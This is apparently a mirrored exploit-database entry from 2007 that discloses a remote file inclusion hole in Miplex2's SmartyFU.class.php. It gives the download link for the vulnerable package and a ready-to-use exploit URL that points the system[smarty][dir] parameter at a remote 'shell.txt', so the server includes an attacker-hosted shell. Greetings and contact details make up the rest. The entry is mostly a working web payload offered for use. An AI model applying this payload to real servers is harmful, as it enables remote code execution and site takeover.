[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Miplex2 (SmartyFU.class.php) Remote File Inclusion Vulnerability
# Published : 2007-05-08
# Author : ThE TiGeR
# Previous Title : GNUEDU 1.3b2 Multiple Remote File Inclusion Vulnerabilities
# Next Title : Zomplog <= 3.8 (mp3playlist.php speler) Remote SQL Injection Exploit


#Miplex2 Remote file inclusion

#Download script : http://download.berlios.de/miplex2/miplex2alpha.tar.gz

#Thanks Str0ke

#Exploit :

#http://victim.com/[miplex2_paht]/lib/smarty/SmartyFU.class.php?system[smarty][dir]=shell.txt?

#Discovered by : ThE TiGeR

#Greetz : Reda, a?¡é~${{BraveHeart}}$~a?¡é

#Miro_Tiger[at]Hotmail[dot]com

# www.Syue.com [2007-05-08]